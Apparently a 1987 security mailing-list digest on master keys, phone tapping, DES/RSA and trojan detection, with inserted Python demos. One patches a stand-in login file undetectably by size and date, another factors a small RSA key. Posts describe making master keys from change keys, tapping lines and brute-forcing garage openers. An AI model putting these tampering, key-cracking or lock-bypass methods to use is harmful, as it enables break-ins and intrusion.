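    os.utime(path, ns=(st.st_atime_ns, st.st_mtime_ns))

def demo():
    """Returns (naive_check_result, hash_check_result) after a stealthy patch."""
    workdir = tempfile.mkdtemp()
    try:
        prog = os.path.join(workdir, "login")
        # Constructed stand-in for a binary; not a real executable.
        with open(prog, "wb") as f:
            f.write(b"\x7fELF" + b"check_password\x00" + b"\x00" * 4096)
        manifest = json.dumps(make_baseline([prog]))   # what you would take off-host
        same_size_patch(prog, 4, b"skip_password\x00\x00")   # 15 bytes replace 15 bytes
        baseline = json.loads(manifest)
        return naive_check(baseline, prog), hash_check(baseline, prog)
    finally:
        shutil.rmtree(workdir)

if __name__ == "__main__":
    naive, strong = demo()
    print("size+mtime unchanged: %s, sha256 unchanged: %s" % (naive, strong))
```

The size-and-date check reports the patched file as unchanged; the digest check does not. Bruno's last point still stands: this script, the Python interpreter and the hash library it calls all live on the machine being checked, so the comparison is only as trustworthy as the medium they are run from.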
From: cosell@cosell.bbn.com (Bernie Cosell) 1-Oct-1987 03:41:34
To:
Subj: [924] Re: Master keys [was "(none)" ]

The locks have multiple-segment tumblers. One of the split-lengths is the same in every lock, so that a key that has just those settings will open all of the locks. You use the same idea to have "submasters" and "grandmasters". I don't remember exactly how it typically goes, but if it were me, I'd have the bottommost tumbler splits be the ones for the most wide-ranging master (that is, the tumbler splits that require the most pushing-up to align and so the largest key height). At least this would mean that (as you suggested) it would take more than just ANY key and a file to make up a master key.

/Bernie\
Bernie Cosell Internet: cosell@bbn.com
Bolt, Beranek & Newman, Inc USENET: bbn.com!cosell
Cambridge, MA 02238 Telco: (617) 497-3503

From: John G Dobnick 2-Oct-1987 00:07:11
To: security@RUTGERS.EDU
Subj: [1759] Re: Master/sub-master keying systems

Just an observation on what appears to be the "standard practice" of setting up master/sub-master keying systems. The way things are set up where I work, it seems that individual keys have the shallowest cuts. Sub-masters have more/deeper cuts, and master keys have the most/deepest cuts.

Now, to my untutored way of thinking (I am not a locksmith), this is exactly the *wrong* way to do things. Conceptually at least, it seems like it is fairly easy to "convert" an individual (single door) key into a sub-master or master with a file.

Actually, this is a little stronger than a theoretical approach. I know of people who *have* converted individual office keys into departmental masters. However, this was years ago; the statute of limitations has long run out, and the buildings/doors in question have since been re-keyed. [This paragraph is here for the purpose of "coverin' me behind"! :-) ]

Anyway, this whole situation strikes me as a gross security risk.
I have discussed this issue with our locksmith, but have received an unsatisfying answer. He claims that this is just the way things are done. Well, I don't buy that. Does anyone out there have a good technical reason why master/sub-master keying systems are done this way? (Ease of implementation is *not* an acceptable technical reason, by the way.) -- John G Dobnick Computing Services Division @ University of Wisconsin - Milwaukee UUCP: {ihnp4|uwvax|uwmacc}!uwmcsd1!jgd INTERNET: jgd@csd4.milw.wisc.edu "Knowing how things work is the basis for appreciation, and is thus a source of civilized delight." -- William Safire

From: William Daul / McDonnell-Douglas / APD-ASD 2-Oct-1987 02:08:14 To: dplatt@teknowledge-vaxc.arpa (Dave Platt) Subj: [1357] Re: Anti-dog (and anti-mugger) sprays

What I know via a Tear Gas (TG) Class from 6 years ago...HALT! will have no effect on humans (at least DON'T bet on it). The Bakersfield Police said in their city, if you use TG (being certified to carry it) in a situation that results in a court case, if the jury/judge feels that your reaction was justified based on your experiences then you will probably be found innocent. They mentioned a case where a nurse walked across a park late at night to get between the hospital and the parking lot. One night she heard rapid footsteps and was then raped. She became certified to carry TG. On another night she was on her way to her car (finger poised on the TG). She heard someone running towards her...she turned and let them have it! She ran off to call the police to tell them she was attacked. Soon afterward a fellow jogger called the police and told them a crazy woman sprayed him with TG. He then sued. The jury found in her favor saying that anyone that had been in her position with her experiences would have done the same thing. The judge told the jogger to run earlier or find another place to run. End of the fairy tale.
--Bi//

From: DPickett@his-phoenix-multics.arpa 2-Oct-1987 08:45:38 To: Security@RUTGERS.EDU Subj: [792] SSN profit motives

Anyone who has information on you indexed by SSN can sell it, reducing your privacy and possibly reducing their opinion of you so that you are harmed. The very fact that they have the data indexed by SSN means that anything they care to file on you can "travel" very far and fast, and sometimes it is not factual. Mistakes happen, and the first party can clean their files, but they have no power over the persons they copied it to.... Even if the organization collecting the information is not sharing it, the indexing by SSN makes it salable by a thief or future owner. Security, yours and mine, comes from giving out information on a need to know basis.

From: tencati@VLSI.JPL.NASA.GOV 2-Oct-1987 15:18:41 To: awalker@red.rutgers.edu Subj: [2976] re: Master keys

Well, before I got into the computer biz, I used to work in a hardware store. One of my jobs was re-keying people's locks. The principle of a key is that when it is inserted into a lock, the ridges on the key raise these little pins inside the lock cylinder. If the right key is inserted, the tops of all the pins are flush with the stationary part of the lock which also has a set of pins of various lengths. The best way to describe it is to picture 2 sets of pins. When you insert your key, the bottom pins rest on top of your key and are pushed up into the top of the lock, against a second set of pins. The lower pins are all different sizes which is why your key has different heights.
If all the bottom pins are flush with the top of the lock cylinder, then you inserted the right key, otherwise, some pins will either stick up past the point where the cylinder turns and protrude into the upper cavity preventing the lock from turning, or the pin will not stick up high enough in which case the upper pin which is spring loaded will protrude down into the lower cavity again preventing the lock from turning. A "MASTER KEY" is any old key. The difference is in the upper pins of the lock. Instead of having only one pin in each upper chamber, the upper chamber is fitted with a series of pins with different heights. So there are segments instead of only one pin. If the correct key is inserted in the lock, the bottom pins are all flush and the cylinder turns. If the master key is inserted, some of the bottom pins may be flush. The ones that aren't correspond to a spot where the bottom pin is not pushed up far enough so that the top pin is pushed into the lower cylinder. However because the upper cavity was fitted with different sized segments (called "master pins"), one of the segments is flush with the top of the cylinder and the lock still opens. In order for this to work, the master key must be known, and each lock must be fitted with pins which allow the primary key to work, and then the master pins are put in. Because the top pins have to have a sum-total of a certain length, the segments can be put in any combination allowing more than one key to act as a master. This is why locks can be picked with a hairpin (it's tricky, but it *does* work). All you have to do is lift the pins to the right height and turn. The problem is overcoming the springs which act to force all pins down into the cylinder. 
Also, if you try a key in a lock, and any of the ridges cause the pins to be raised up such that the lower set of pins pushes up into the upper cavity and the upper pins can't move any higher, the key will not be able to fit any further into the lock, which is why sometimes your key won't fit in someone else's lock. Hope this answered your question. Ron Tencati Jet Propulsion Laboratory

From: Mike Linnig 2-Oct-1987 19:30:36 To: security@RED.RUTGERS.EDU Subj: [675] RE: garage frobs

talking about the security of garage door openers... My house builder installed my garage opener. He probably also installed the same model in all of my neighbors' houses. The garage door is digitally keyed.. there are 256 codes. I once thought of all the fun I could have if I got a one hundred watt linear amp and attached my tiny garage door transmitter to it. Of course I'd have to rig something to cycle through all 256 different codes but that wouldn't take long (grin!) An entire neighborhood with ONE remote control! Mike

From: simsong@broadway.columbia.edu (Simson L. Garfinkel) 3-Oct-1987 10:13:57 To: security@RUTGERS.EDU Subj: [1040] Master keys

Along the lines of keys and master keys, the system isn't always as good as people make it out to be. When I was in high school, I happened to be a computer consultant at the college across the street, and they gave me a key to open the computer room in the morning. One day, I discovered that the key blank from the college computer room fit into the lock of the high school computer room (which also had a tendency to be locked in the morning.) Not only did it fit, but it also turned in the lock! After comparing my key with the key of one of the teachers, we figured out what happened: the college computer room key fit about half of the pins for the high school computer room's "slave" key, half the pins for the "master" key. A real fluke, but it effectively gave me a generic computer room key, for which I was grateful.
................................................................simson

From: bzs@bu-cs.bu.edu (Barry Shein) 4-Oct-1987 16:26:00 To: mlinar%poisson.usc.edu@oberon.usc.edu Subj: [1449] Telephone tapping via the isolation box

>That is hardly worthwhile. What you have done MAY stop a true amateur, but
>wire tapping can be cleanly done anywhere along your phone line.

Waitaminute, do we have a case of security-macho here? Maybe he's only trying to protect against the "true amateur"? Remember, the only person that's going to bug his phone is a person with a motivation to do so. More often than not that will be someone w/in the organization who isn't going to expend the resources to hire a pro, but if a pair of alligator clips will do the job, what the hell, right? Years ago I had an office which had a wire-closet for a good portion of the building behind the door. I got curious and began playing with a pair of alligator clips and found a phone line which appeared to be unused. This was useful because my phone line could not dial off-campus while the discovered one could (not long-distance, that took an access code, but even up the corner for a pizza.) [standard disclaimer: this of course was on another planet where such things are encouraged.] If someone had simply put a locked box over it I'm sure I would have never bothered to investigate (unless it was such a dumb lock...but that's a different story.) Let's not make the best the enemy of the good. -Barry Shein, Boston University

From: "Robert (Al) Hartshorn" 5-Oct-1987 12:12:39 To: security@RUTGERS.EDU Subj: [1362] Re: Telephone tapping via the isolation box

Just a short note. I retired from the US Army (MI). I inspected sites for security problems (TEMPEST). Just to let you know, there are so many ways to monitor your PC. We could monitor your phone line at the house, at the pole, at a transmitting site, or even monitor your power lines.
There are more ways to do it than one would normally think about, and a lot of the things that one would need can be gotten locally. If you have information that you don't want anyone else to see, filter your power line, put a ground screen on all four walls, floor and ceiling. Ground your PC to a ground point that you can only get to from inside the room, and now place your PC in a shielded box, with your only access toward the largest mass of your house. This will do for a start. This may sound like a joke, but this is just some of what you would have to do. To me, it sounds like too much work and I just don't have anything that I want to prevent anyone from getting so bad. But to secure your phone connection box is not a bad idea for other reasons. You can never tell when someone may connect to it and make a call. Have fun, and don't let this go to your head. Al

From: Jeffrey R Kell 5-Oct-1987 14:27:58 To: SECURITY@RED.RUTGERS.EDU Subj: [444] Re: Master keys

Not to mention the MASTER-master-key of most large-scale lock systems; if you watch them 'change' locks, a special little 'key' is inserted, turned, and THE WHOLE CYLINDER comes out of the door. 'BEST' (company) locksets work this way (a common supplier of large-scale locksets). /Jeff/

From: John Owens 6-Oct-1987 10:49:33 To: Security Mailing List Subj: [615] Re: Secure phones

The most likely reason that the NSA couldn't decipher the multiply-encrypted operating system is that they were looking for text. How would they recognize the "cleartext" when they had it, if what was sent was machine code? I wonder if they believed it when the sender gave them the keys, since it still didn't come out to anything sensible. (Of course, this assumes that it was machine code that was sent, and not source. Glenn?)

From: wayner@svax.cs.cornell.edu (Peter Wayner) 6-Oct-1987 21:34:27 To: misc-security@beaver.cs.washington.edu Subj: [604] DES is required by LAW for international communications???
Glenn (Everhart%Arisia.decnet@ge-crd.arpa) writes that all international communications must be sent encrypted by DES by LAW. ---- Is this true? Can anyone confirm, deny, or provide the necessary legal information? I thought you needed an export license to send the DES algorithm across the seas. How can the other side decode the message? -Peter Wayner (wayner@crnlcs.bitnet or wayner@svax.cs.cornell.edu)

From: murray@andromeda.rutgers.edu (Murray Karstadt) 7-Oct-1987 15:43:42 To: security@red.rutgers.edu Subj: [949] This may be somewhat off the mark for this group but...

What we would like to do at our PC lab is leave software and manuals out for easy access by students. These disks are the usual mix of commercial stuff that most PC labs have. The question is: How can we have a relatively open environment and not have the disks ripped off. B. Dalton's and other large book/software sellers use electronic security systems that are supposed not to fry disks. It would be nice to have one of these systems installed at the lab. But most likely they cost too much. Does anyone have any experience with one of these systems in a PC lab? Is there a cheaper way of securing disks while maintaining an open access system? Is this another example of my typical brain damage and not at all practical? waiting and hoping for some answers murray

From: half@mitre.arpa 7-Oct-1987 17:53:36 To: security@red.rutgers.edu Subj: [1956] phone security

It's always amazing to hear the stories floating around about comsec. Now another DES crack story with the usual cast of characters: a grad student with a PC finds the famed trapdoor, --hidden years ago by a combination code designer and past chess grandmaster. The proof is shown to civil servants from Ft. Meade whose first instinct is to banish the student to a little known military reservation outside Atlanta, Ga. Of course, the officials know nothing about this and have no comment on the specifics. But the student told his friend, word is out! OK, why not?
But I figure this is the tenth such story in the last two years. As I understand it (from what I read in the press, specifically Cryptologia) DES can be attacked brute force; however, it's expensive. Now there is a cost per message whereas formerly, the traffic was free to harvest. More traffic, more cost and the result is that you have to divert money from other more important projects to keep brute forcing all those DES messages. So management makes you limit your DES haul in favor of more productive projects. Remember, DES is usually low grade traffic. You need a lot of it to make sense of important things, --which is now expensive. Again going back to the press we see David Kahn writing in the Fall 1979 issue of Foreign Affairs "Cryptography goes Public" about intercepting telephone voice traffic. You can read what he says for yourself but basically, the STU-III telephone (described in the New York Times about six months ago) is to help keep government information private, not to help the telephone companies become "secure". I am looking forward to the next DES break story. In fact I may write my own: perhaps a former World War II cryptographer notices an uncanny pattern in s-box number two whose mirror image he sees in the key bits....

From: Phil Benchoff 5-Oct-1987 08:35:04 To: SECURITY@RED.RUTGERS.EDU Subj: [1781] Electronic door locks and anti-shoplifting devices.

We have a very neat security system on our computer room here. Authorized people carry cards which are held in front of 'readers' at the doors to gain access. Each card has a number which the security system hands to a computer which determines if the person is currently authorized. The cards are credit card sized with no visible magnetic strip. The center layer of the card looks like a glass-epoxy printed circuit board. You can usually get in the door just by holding your wallet close to the reader. The manufacturer is Schlage Electronics. Does anyone know how this system works?
The readers determine a 4-digit(?) number, so it can't be that simple. How expensive is such a system? It is very convenient to have one card that can be used on several doors, saves the cost of re-keying locks if one is lost, and provides an audit trail of who has been where. How about anti-shoplifting systems that work on similar principles? Stores that use them either remove something from a product when it is bought, or pass things over a demagnetizer(?) when they are paid for. I have disassembled several things that I have purchased to look for whatever they put there, but haven't found anything. I suspect that only a random sample of items actually have protection from being carried out. A final note: The two systems must be very similar, because I am told that the computer room card will trip some of the anti-shoplifting alarms. Oh, the joys of being a DP professional. :-)

From: Larry Hunter 8-Oct-1987 14:09:41 To: Subj: [2745] RE: Re: Secure phones

GE: 1. DES was originally certified, but was designed with a short enough key that NSA could break it by brute force. (It IS a federal law that no cipher may be used for international traffic that NSA can't break, so the permeability of DES follows from reading the relevant US Code sections.)

LH: Although the brute force math is easy enough to demonstrate, this legal stuff is news to me! What are the relevant US Code sections? As far as I can tell it isn't in the Foreign Intelligence Surveillance Act, and there is no mention of this in Bamford's The Puzzle Palace. Where can I find either the statute or a detailed reference?

GE: I never did hear where in the US code the law I referred to exists; just got the info some years ago from some folks who did work on some spook jobs who were in a position to know.

I'm suspicious.
According to the Congressional Office of Technology Assessment series on Federal Government Information Technology (3 vols: Electronic Surveillance and Civil Liberties (1985), Management, Security and Oversight (1986) and Electronic Record Systems and Individual Privacy (1986)), the relevant policy documents are the Brooks Act (1965), the Privacy Act (1974), OMB circular A-71 transmittal memo 1, Presidential directive NSC-24, the Paperwork Reduction Act, the Federal Managers Financial Integrity Act, National Security Decision Directive 145 (the biggy: "National Policy on Telecommunications and Automated Information Systems," which sets NSA as the focal point for both military and civilian information security) and OMB circular A-130 -- None of which support your claim that there is statute (or even policy) prohibiting use of a cipher that NSA can't break. The Foreign Intelligence Surveillance Act, which made NSA into a legislated government body, doesn't mention it, either. Even the idea is suspect: wouldn't that mean that there was a list somewhere of ciphers that NSA couldn't break?! Doesn't sound like the kind of list I'd want to see passed around. That doesn't mean I don't believe that NSA tries to ensure that it can crack every message, say by getting the key size of DES cut in half. I had an extended correspondence with one of the designers of DES where I convinced him that NSA cut the key size so that it would be vulnerable (you can have a copy of those messages if you are curious). I just don't believe there is any statute that says such a thing, and you should be careful about making any claim that there is. Larry

From: ATSWAF%UOFT01.BITNET@WISCVM.WISC.EDU 8-Oct-1987 19:53:01 To: SECURITY @ RED.RUTGERS.EDU Subj: [649] BITNET mail follows Subject: Homing Devices

Does anyone know where to conveniently purchase some kind of device to place in a car to track where that car is going? Does Radio Shack have anything like that?
How much would everything involved with it cost? And what is a reasonable distance it would work at? Thanks Wendy Fraker University of Toledo ATSWAF%UOFT01.BITNET@WISCVM.WISC.EDU

From: paul@uxc.cso.uiuc.edu (Paul Pomes - The Wonder Llama) 10-Oct-1987 21:46:42 To: security@RUTGERS.EDU Subj: [731] telephone tapping

My object is not to be secure against professionals or those with excess cash for nifty devices. The "threat" to my privacy are the students in my Explorer post and the local high school students who shop at Radio Shaft. For the money ($3 and a half-hour) I've secured a too easy tap point. Beyond that it's not worth the trouble. The telco people in C-U usually lock the junction boxes. (Have you ever gone up a pole? It's quite stimulating to the adrenals when done illicitly. 'Tis far better to have a lower profile than stimulate that sort of interest in your calls.) -pbp

From: mason@OBERON.LCS.MIT.EDU (Nark Mason) 8-Oct-1987 13:18:36 To: AWalker@red.rutgers.edu, jm7@pyr.gatech.edu Subj: [942] Re: Simson Garfinkel's article, part 3 of 3

I recently wrote an RSA encryption algorithm to be used for encrypting banking system audit logs. The software hasn't been delivered yet but we are using 200 digit bignum arithmetic, which when Rivest, Shamir and Adleman wrote their paper in '77 they estimated 3.8 * 10E9 years to factor it. The great thing about RSA encryption is the more secure you want it to be the longer the number you use (and the slower it runs), whereas something like DES always takes the same amount of time to break. The reason banks use numbers small enough to be factored in a couple of (cpu) weeks is that the data is obsolete (and therefore useless) within a week. We have stuck to 200 digit arithmetic because it impresses people more and we don't actually have to use it yet.
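The trade-off Mason describes (a longer modulus buys security at the cost of speed, and a modulus small enough to factor gives up the private key entirely) can be seen end to end in a few dozen lines. This is an added example, not the banking software from the post: textbook RSA with no padding, the constructed primes 1000003 and 1000033 chosen so that the modulus is only 13 digits, and Pollard's rho as the "someone bothers to break the code" step. Everything here runs unchanged with 100-digit primes; only the factoring step stops finishing.

```python
"""RSA key size versus factoring effort. Added example, not from the posts.

Textbook RSA (no padding, for illustration only) plus a naive factoring
attack that recovers the private exponent from a small public key.
"""
import math


def keygen(p, q, e=65537):
    """Return ((n, e), (n, d)) for primes p and q. Assumes gcd(e, phi) == 1."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
    return (n, e), (n, d)


def encrypt(pub, m):
    """Plain RSA on an integer m < n; no padding, so not for real use."""
    n, e = pub
    return pow(m, e, n)


def decrypt(priv, c):
    n, d = priv
    return pow(c, d, n)


def pollard_rho(n, seed=2, c=1):
    """Return a non-trivial factor of composite n (Floyd cycle detection).
    Cost grows roughly with the square root of the smaller prime factor,
    which is why the digit count of n matters."""
    if n % 2 == 0:
        return 2
    x = y = seed
    d = 1
    while d == 1:
        x = (x * x + c) % n
        y = (y * y + c) % n
        y = (y * y + c) % n
        d = math.gcd(abs(x - y), n)
    if d == n:  # the sequence cycled without exposing a factor; retry
        return pollard_rho(n, seed, c + 1)
    return d


def recover_private_key(pub):
    """Factor n, then rebuild d exactly the way keygen did."""
    n, e = pub
    p = pollard_rho(n)
    q = n // p
    return keygen(p, q, e)[1]


def digits(n):
    """Decimal length of the modulus, the figure the post quotes."""
    return len(str(n))


if __name__ == "__main__":
    # Constructed small primes so that the attack finishes instantly.
    pub, priv = keygen(1000003, 1000033)
    print("modulus digits:", digits(pub[0]))
    c = encrypt(pub, 123456789)
    print("round trip ok:", decrypt(priv, c) == 123456789)
    print("private key recovered:", recover_private_key(pub) == priv)
```

Once the factor is known the attacker rebuilds d and reads every message sent under that key, which is the point made in the reply: the cost of breaking a small modulus is paid once, not once per message.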
From: jm7@pyr.gatech.edu (John McLeod) 8-Oct-1987 17:43:27 To: AWalker@red.rutgers.edu, jm7@oberon.lcs.mit.edu, mason@oberon.lcs.mit.edu Subj: [401] Re: Simson Garfinkel's article, part 3 of 3

~50 digits is fine until someone bothers to break the code the first time. The first time that the key is broken, then the person who has the key has access to all messages as they are sent. jm7

From: jmturn%ringwld.UUCP@CCA.CCA.COM 8-Oct-1987 14:21:37 To: security@RED.RUTGERS.EDU Subj: [1435] Re: master keys

Back when I worked for LMI, I had occasion to assist one of our resident amateur locksmiths in rekeying a lock. The basic goal was to create a secure door for the video room, which would open to my key, and no one else's. LMI used the standard system where your office key was also the front door key. This is a variant on the concept of a master key. Rather than one key opens many locks, this is one lock with many keys. Obviously, you can't use the split-pin idea to make that work, you'd need an almost infinite number of sections in a large building. Instead, the lock only has some subset of the total number of pins (3 pins in a 5 pin system, for example). This makes for an interesting trade off. By definition, all the keys must share a certain number of common pins. Therefore, there is a trade-off. The more pins they share in common (and thus, the more pins on the outside lock), the more secure the outside door is. On the other hand, the less unique pins between keys, the easier it is to gimmick someone else's lock given you have a key. It was VERY easy to gimmick LMI locks... Save Your Vertical Blanking Intervals for Big Cash Prizes! James Turner (The Ringworld Engineer)

From: quintus!gregg@Sun.COM (W. Gregg Stefancik) 9-Oct-1987 12:17:02 To: security@red.rutgers.edu Subj: [1162] Master Keys..

Being a recent graduate of the Foley Belsaw Institute's course in locksmithing, I would like to describe the technique for master keying and the way one can make a master key.
Most master key systems have 2 or more shear lines. One shear line is for the change key (the key which will open that door only). The second shear line is for the master key. If there are any other additional shear lines they would be for the grand master key, grand grand master key, etc. In a good master key system a change key will not have any of the same depth cuts as the master and the master will not have any of the same depth cuts as the grand master, etc. So there is no sure way of making a master key from any number of change keys. The only way I know of to make a master key is to remove a lock from service and either pick or open the lock with a key then dump the pins and determine how many keys will open the lock. Make all of these keys (probably no more than two or three keys) and see which one opens other locks. Gregg

From: webber@brandx.rutgers.edu (Webber) 10-Oct-1987 22:28:22 To: misc-security@RUTGERS.EDU Subj: [1862] Checking for trojan horses (Re:Simson Garfinkel's article, part 3...)

> If you keep another copy of the program to run a diff against it should be
> hidden so that both the program and the copy aren't changed. Best would be
> to bring a copy in off some removable media to do the comparison. The medium
> should only be mounted when the person to do the comparison is there in
> person. Even then the program for reading the file in or the diff program
> could have been tampered with.

Actually, best would be to have the ``copy'' on an isolated system. You then detach the ``original'' from the public system and have the isolated system inspect it (but of course, not execute any files that are on it). Just as programs like ``crypt'' can be subverted, so can ``diff,'' ``ls,'' and even ``cat.'' Or things can be done directly in the operating system, e.g., setting it up such that ~cracker/bin is implicitly at the front of everyone's path -- then /bin/crypt will always look just fine (although no one is ever actually running it).
Similarly, login shouldn't be handled by a system that can be remotely programmed. Properly done, password modems should be considerably more secure than letting login verification be handled by the ``exposed'' system. Of course, much of the hyper-concern about computer security is misplaced. Traditional security people say you should set up security so that it costs more to break it than it is worthwhile to break. On a computer system, we should probably say that you should set up enough security so that ``system bugs'' cause more problem than ``malicious users.'' Using this approach, many systems are exceptionally secure. ---- BOB (webber@aramis.rutgers.edu ; rutgers!aramis.rutgers.edu!webber)

From: obrien@aerospace.aero.org 12-Oct-1987 15:16:40 To: security@RUTGERS.EDU Subj: [2458] Re: Master/sub-master keying systems

OK, here's the poop on master/grandmaster systems, from one who was at one time a bonded locksmith. Master/grandmaster systems should not be used unless absolutely necessary. It's like the difference between a system that has a root password and one that doesn't. However, since these are physical systems, the mere existence of the "root password" actually weakens the rest of the security system. Yes, those folks who note the existence of several "splits" in a single pin are correct. That's how the trick is worked. However, note that lock pins are not very large. There is a limit to how close splits can be made, as these mean very thin disks of metal between the splits. These disks wind up riding around the cylinder wall every time either key is used; sometimes on the inside and sometimes on the outside, depending on which break is used. It can sometimes happen that a disk which is too thin will turn sideways in the chamber. Result: lock-out. In addition, the more splits there are in a lock, the easier it is to pick, for reasons I won't bother with here. Now to the question of keys. Remember that a key is just a long metal blade.
The deeper the key is cut, the thinner the blade. The thinner the blade, the more likely it is to break off in a recalcitrant lock. Result: lock-out. The answer is then that most keys should be of the thick variety, since the sheer number of key-uses is far larger than the total number of grand-master uses, even if the grand-master is in constant use. So, individual keys get the higher cuts. Of course, you could argue, you could arrange the grandmaster such that some cuts are very high and some are very low. Indeed this is sometimes done, but there are two reasons against it: 1) A low cut in the middle results in a weakened key: it has a "thin spot" and can break. 2) In general, for all keys, there is (or should be!) a limit on the maximum "jump" in height from one cut to the next. Remember, as the key goes in and out of the lock, the pins have to ride up and down. Too great a difference between one cut and the next results in a very steep "roller-coaster" ride for the pins. Unless they are very well-lubricated, this can result in a stuck key. Result: lock-out. Hope this settles the hash of this question! Mike O'Brien

From: Clive Dawson 13-Oct-1987 13:06:37 To: security@RED.RUTGERS.EDU Subj: [1342] Unscrambling satellite signals

I don't own any sort of satellite reception equipment, so don't really keep up with the latest developments. Prior to this weekend, I had the impression that the signal scrambling being used by most (all?) of the major signal providers was DES-based and basically fool-proof. I believe there was some discussion of this subject on this list several months ago, but don't recall whether the following was covered. A friend of a friend bought a Video-Cypher II box some time ago with the intention of paying a fee to the various providers of signals he was interested in. This weekend I learned that this person obtained a chip for the Video Cypher II box which will unscramble ALL signals at ALL times.
The only instructions that were given when this chip was installed were: "Make sure that your box is turned on for at least 8 hours on the first working day of each month." (Presumably to get all the encryption key updates...) So it looks like somebody has actually "cracked" the system. Is this general public knowledge by now? Note that when I say "the system" I do NOT mean DES itself. It sounds to me like this chip most likely exploits a flaw in the key distribution procedure. Clive

From: simsong@broadway.columbia.edu (Simson L. Garfinkel) 12-Oct-1987 21:06:47 To: security@red.rutgers.edu, elbows@oberon.lcs.mit.edu, sipb@athena.mit.edu Subj: [805] Request

One more request, if anybody can help... I'm doing some research on computer databases used for blacklisting purposes. I've heard of three of them, but haven't been able to get any pointers so far. The three that I've heard of are: 1. A database of oil workers who have filed workmen's compensation claims. 2. A database of people who have sued for medical malpractice. 3. A database of people who have filed complaints against their landlords. If you have any hard references for any of these databases or others, please let me know: simsong@broadway.columbia.edu -or simsong@eddie.mit.edu Thanks.

From: Brian A. LaMacchia 12-Oct-1987 23:38:57 To: simsong@broadway.columbia.edu Subj: [615] Request

> 2. A database of people who have sued for medical malpractice.

I remember hearing that this one goes BOTH ways, i.e. there are two lists: one list is for doctors and lists people who have sued doctors for malpractice, and the other list is for patients and lists doctors which have been sued and what the results of those suits were. So while doctors are trying to avoid patients who sue a lot, patients are looking for doctors who get sued a lot (and lose). --Brian

From: warren@xanth.cs.odu.edu (Frank F. Warren Jr.)
13-Oct-1987 13:11:00 To: misc-security@mcnc.org Subj: [1223] Re: Master/sub-master keying systems

John is correct in his observations concerning deep-cut master key systems. Having earned a living as a locksmith for the past six years I can give a technician's view of master keying. Various sources have held forth for the use of both deep and shallow masters. My mentor in the trade taught me to use as few master pins as possible and shallow master cuts. This relates to the principle of making the system as small as possible while allowing for some expansion. Each master keyed cylinder has 2^N (N= number of master pins) potential keys. The system has 4^N potential operating keys. Given these values the reason for keeping to a small N is obvious. In practice I have found no need to use deep masters and anyone who does so is likely to be following his early training at the hands of a deep master proponent. -- Frank Warren, Jr. Old Dominion University - Norfolk, Virginia warren@xanth.cs.odu.edu Old Arpa: warren%odu.edu@RELAY.CS.NET warren@xanth.UUCP old uucp: {decuac,harvard,hoptoad,mcnc}!xanth!warren Packet: KB4CYC@WD4MIZ

From: NESCC%NERVM.BITNET@wiscvm.wisc.edu (Scott C Crumpton) 15-Oct-1987 13:33:00 To: SECURITY@RED.RUTGERS.EDU Subj: [1846] re: Master keys

There is a very simple reason why master keys tend to have less metal on them than the non-master keys. It's easier to make them that way. Let's take a simple example: A lock that will have one standard key and one master. To key it you start with an empty cylinder (no pins in it yet), the regular key, and the master (with less metal than the regular key). Place the regular key in the cylinder and try different length bottom pin segments in each position until each position contains one bottom segment that is exactly the right length to be flush with the edge of the cylinder. Remove the regular key and insert the master. All of the pin segments will now be too short.
Add middle (mastering) segments, 1 each, in each position until their tops are again flush. Now insert the cylinder into the lock using the proper tools. The top pins in the lock are all the same length; no changes in these pins are made. Done.

Notice that this is basically a trial and error process. If the master key has less metal than the regular key(s) it can be done in a single pass. If, however, the master has more metal in one or more positions, several passes will be required.

In a major job with many locks and several levels of mastering, the problem of a sparse master should never occur (unless the locksmith is either lazy or incompetent). Such jobs require significant planning and all of the necessary pin segment lengths can be determined in advance. Keying the locks is then a simple matter of dropping in the right pin segments in the right order. It is not even necessary to have the keys cut yet.

Please note that I am not a locksmith, only an interested observer.

---Scott.

From: jcmorris@mitre-bedford.ARPA (Joseph C. Morris)  6-Oct-1987 18:26:33
To: misc-security@mitre-bedford.arpa
Subj: [1029] Re: master keys

Several years ago there was a report that MIT had been hit with numerous breakins (some versions say the intent was pranks, not burglary) which had been accomplished with keys which opened various locked offices. According to the reports (more accurately: rumors) going around the Institute, the keys were manufactured by students who had removed the door locks from the bathrooms in the main MIT building (that's buildings 1 through 10) and had disassembled them to find the common pin breaks. All they had to do then was to file a key which aligned the common breaks with the cylinder radius; since the locks represented doors from all parts of the building (despite the range of numbers it's one structure) they had a master for almost every door.
Except for buildings in which the bathrooms are routinely locked, who would notice that the doors were missing the lock cylinder?

From: oster%dewey.soe.Berkeley.EDU@berkeley.edu (David Phillip Oster)  20-Oct-1987 16:07:25
To: misc-security@ucbvax.berkeley.edu
Subj: [492] NSA joke

A friend of mine just returned from a math convention. He tells me that the story circulating there is:

The NSA is now funding research not only in cryptography, but in all areas of advanced mathematics. If you'd like a circular describing these new research opportunities, just pick up your phone, call your mother, and ask for one.

From: steinmetz!barnett@vdsvax. (Bruce G Barnett)  20-Oct-1987 20:17:56
To: misc-security@uunet.uu.net
Subj: [799] Re: (none)

Murray Karstadt writes:
|Does anyone have any experience with one of these systems in a PC lab?
|Is there a cheaper way of securing disks while maintaining an open access
|system?

I don't have a cheap solution, but one alternative is to use a product that provides NFS service to the PCs (yes, you need an ethernet card). You would only need one copy of the programs on a hard disk, and the floppies wouldn't be necessary. (Assuming the programs themselves can run on a hard disk without floppies.)

One such product is available from Sun (PC-NFS). There may be others.

-- 
Bruce G. Barnett   uunet!steinmetz!barnett

From: warren hik  21-Oct-1987 00:56:37
To: security@RED.RUTGERS.EDU
Subj: [667] pc lab

> The question is: How can we have a relatively open environment and not
> have the disks and manuals ripped off.

Put the manuals in a LOCKED manual rack, or have them chained to a table.

Have one pc in your lab designated as a file server. Students must bring their own floppies and copy any needed software off the (read-only) hard disk of the file server onto THEIR OWN DISKS. The file server would not be used except for this purpose, to ensure that it was available.

Who needs electronic surveillance...
-Wren

From: James Deibele  21-Oct-1987 03:12:22
To: tektronix!misc-security%reed.uucp@relay.cs.net
Subj: [1720] B. Dalton Security Devices

>The question is: How can we have a relatively open environment and not
>have the disks ripped off.
>It would be nice to have one of these systems installed at the lab.

Those devices are manufactured by the Knogo corporation and are extremely expensive. They are not terribly effective, and you need to have someone keeping a close eye on things---an easy way to beat the system is to put the tagged item underneath or above the sensor panels. The tags are easy to find if you're looking for them, and not very difficult to remove.

